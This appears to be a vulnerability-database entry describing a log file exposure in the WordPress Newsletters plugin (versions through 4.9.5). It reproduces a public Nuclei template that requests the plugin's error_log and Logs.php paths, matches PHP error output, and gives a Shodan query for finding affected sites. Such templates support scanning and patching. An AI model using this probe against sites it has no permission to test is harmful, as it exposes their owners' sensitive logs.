漏洞描述
The Newsletters plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.9.5. This makes it possible for unauthenticated attackers to extract potentially sensitive information from log files.
wp-newsletter-log-exposure: WordPress Newsletter - Log File Exposure
PoC代码[已公开]
id: wp-newsletter-log-exposure
info:
name: WordPress Newsletter - Log File Exposure
author: pussycat0x
severity: medium
description: |
The Newsletters plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.9.5. This makes it possible for unauthenticated attackers to extract potentially sensitive information from log files.
reference:
- https://wpscan.com/vulnerability/334e02e9-fcbd-47fe-b7ab-079dd525b396/
metadata:
shodan-query: http.html:"/wp-content/plugins/newsletter/"
tags: wordpress,wp-plugin,newsletter,logs
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/newsletter/error_log"
- "{{BaseURL}}/wp-content/plugins/newsletter/classes/Newsletter/Logs.php"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'regex("\\[\\d{2}-[A-Za-z]{3}-\\d{4} \\d{2}:\\d{2}:\\d{2}", body)'
- 'contains_any(body, "PHP Fatal error:", "PHP Warning:", "PHP Notice:", "PHP Parse error:")'
condition: and
# digest: 490a0046304402201635d07803d2698f11862ca087686645699547de841e6d573e6255195ffe969c02204d091dd88f233eca8658be09a9e5025df1705c722afdc6db46127de2723eb13c:922c64590222798bb761d5b6d8e72950